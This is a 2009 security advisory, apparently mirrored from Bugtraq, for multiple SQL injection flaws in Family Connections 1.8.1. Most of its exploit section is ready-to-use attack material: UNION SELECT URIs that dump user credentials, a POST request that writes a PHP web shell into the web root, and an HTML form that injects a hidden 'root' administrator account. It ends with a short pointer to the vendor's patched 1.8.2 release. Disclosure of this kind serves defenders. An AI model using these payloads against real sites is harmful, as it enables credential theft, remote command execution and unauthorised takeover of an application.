|
Feeds -
Exploits
|
|
Written by Salvatore "drosophila" Fresta
|
|
Tuesday, 31 March 2009 22:40 |
Family Connections Multiple SQL Injection Vulnerabilities
-\\Bugtraq ID:
34297
-\\Class:
Input Validation Error
-\\CVE:
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Mar 30 2009 12:00AM
-\\Updated:
Mar 31 2009 06:56PM
-\\Credit:
Salvatore "drosophila" Fresta
-\\Vulnerable:
Haudenschilt Family Connections 1.8.1
-\\Not Vulnerable:
Haudenschilt Family Connections 1.8.2
-\\Discussion
Family Connections is prone to multiple SQL-injection vulnerabilities because it
fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application,
access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to Family Connections 1.8.2 are vulnerable.
-\\Exploit(s)/PoC(s):
Attackers can use a browser to exploit these issues.
The following example URIs, data, and exploit are available:
http://www.example.com/path/addressbook.php?letter=-1%25' UNION ALL SELECT 1,2,
NULL,username,5,password,email FROM fcms_users%23
http://www.example.com/path/recipes.php?category=1&id=1 UNION SELECT 1,2,
username,password,5,6 FROM fcms_users
http://www.example.com/path/activate.php?uid=1 or 1=1&code=
POST /path/lostpw.php HTTP/1.1\r\n"
Host: www.site.com\r\n"
Content-Type: application/x-www-form-urlencoded\r\n"
Content-Length: 193\r\n\r\n"
email=-1' UNION ALL SELECT '<?php echo "<pre>"; system($_GET[cmd]);
echo "</pre><br><br>";?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
INTO OUTFILE '/var/www/htdocs/path/rce.php'#
================================================
34297.html
^^^^^^^^^^^
<html>
<head>
<title>Family Connection 1.8.1 Create Admin User Exploit</title>
</head>
<body>
<p>This exploit creates an user with administrator privileges
using follows information:<br>
Username: root<br>
Password: toor<br>
<form action="http://www.example.com/fcms/register.php" method="POST">
<input type="hidden" name="username" value="blabla">
<input type="hidden" name="password" value="blabla">
<input type="hidden" name="email" value="blabla@blabla.blabla">
<input type="hidden" name="fname" value="blabla">
<input type="hidden" name="lname" value="blabla">
<input type="hidden" name="year"
value="00-00-000','fakeuser','fakepassword'), (1, NOW()
, 'root',
'root', '
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
', '00-00-00', 'root',
'7b24afc8bc80e548d66c4e7ff72171c5')#'">
<input type="submit" name="submit" value="Exploit">
</form>
</body>
</html>
-\\Solution
The vendor has released updates. Please contact the vendor for details.
Haudenschilt Family Connections 1.8.1
--Haudenschilt FCMS_1.8.2.zip
http://downloads.sourceforge.net/fam-connections/FCMS_1.8.2.zihttp://downloads.
sourceforge.net/fam-connections/FCMS_1.8.2.zip
-\\Reference(s)
--Family Connections Homepage
http://www.familycms.com/index.ph (Family Connections)
--Family Connections 1.8.1 Multiple Remote Vulnerabilities
http://www.securityfocus.com/archive/1/50227 ("Salvatore \"drosophila\" Fresta"
<
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
--Re: Family Connections 1.8.1 Multiple Remote Vulnerabilities
http://www.securityfocus.com/archive/1/50231 (
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
)
|
